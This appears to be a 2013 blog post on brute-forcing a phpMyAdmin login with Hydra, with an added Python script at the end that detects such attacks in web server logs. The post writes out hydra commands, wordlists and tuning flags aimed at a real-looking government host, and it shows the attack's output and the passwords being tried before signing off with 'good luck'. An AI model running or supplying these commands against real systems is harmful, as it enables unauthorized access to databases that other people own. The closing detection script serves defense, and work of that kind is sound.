Saturday, 27 April 2013

Brute Password phpmyadmin....!!!

Quote:Original Posted By linuxeruciha
Apologies in advance if I word anything wrong...
I'd like to ask: is there a tool in BackTrack for brute-forcing a phpMyAdmin password?


phpmyadmin auth ref : http://wiki.phpmyadmin.net/pma/Auth_types

Quote:auth_type http also prompts for a MySQL username and password, but does so using HTTP Basic authentication. The look of the prompt is determined by the browser; most pop up a login window.

Let's just use hydra.

Example:

At first it will certainly go like this, timing out:

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:10:48
[DATA] 16 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service http-head on port 80
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting


We raise the timeout to 50 with -w (default: 20), then lower the thread count to 10 with -t (default: 16):

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 06:56:16
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-get on port 80
[STATUS] 1447.00 tries/min, 1447 tries in 00:01h, 1706209 todo in 19:40h
[STATUS] 1442.33 tries/min, 4327 tries in 00:03h, 1703329 todo in 19:41h


Here is an example with verbose output added (-V):

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50 -V
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:05:24
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-head on port 80
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!magnus" - child 0 - 11 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!power" - child 9 - 12 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""A" SIDES" - child 3 - 13 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 0 - 14 of 1707656
-------8<---------snip
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "# List of common male names." - child 1 - 56 of 1707656


good luck!
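
Seen from the server side, runs like the ones above leave a steady stream of 401 responses to /phpmyadmin/ from a single address in the access log. The following is an added example, not part of the original post: it flags such clients in combined-format log lines. The log lines, addresses, function names and the threshold of 20 failures per 60 seconds (far below the roughly 1447 tries/min in the status output above) are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_basic_auth_bruteforce(lines, prefix="/phpmyadmin", threshold=20, window_s=60):
    """Return {ip: peak count} for clients whose 401 responses under `prefix`
    reach `threshold` inside any sliding window of `window_s` seconds."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # ip -> timestamps of its recent 401s
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["status"] != "401":
            continue
        if not m["path"].lower().startswith(prefix):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

def sample_log():
    """Constructed log lines: one client failing once per second, one normal user."""
    lines = [
        f'203.0.113.7 - root [16/Sep/2011:07:05:{s:02d} +0700] '
        f'"HEAD /phpmyadmin/ HTTP/1.0" 401 - "-" "-"'
        for s in range(30)
    ]
    # A browser's first request carries no credentials, so one 401 is normal.
    lines.append('198.51.100.4 - - [16/Sep/2011:07:05:10 +0700] '
                 '"GET /phpmyadmin/ HTTP/1.1" 401 381 "-" "-"')
    lines.append('198.51.100.4 - alice [16/Sep/2011:07:05:15 +0700] '
                 '"GET /phpmyadmin/ HTTP/1.1" 200 8123 "-" "-"')
    return lines

if __name__ == "__main__":
    for ip, peak in find_basic_auth_bruteforce(sample_log()).items():
        print(f"{ip}: {peak} failed logins to /phpmyadmin within 60 s")
```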
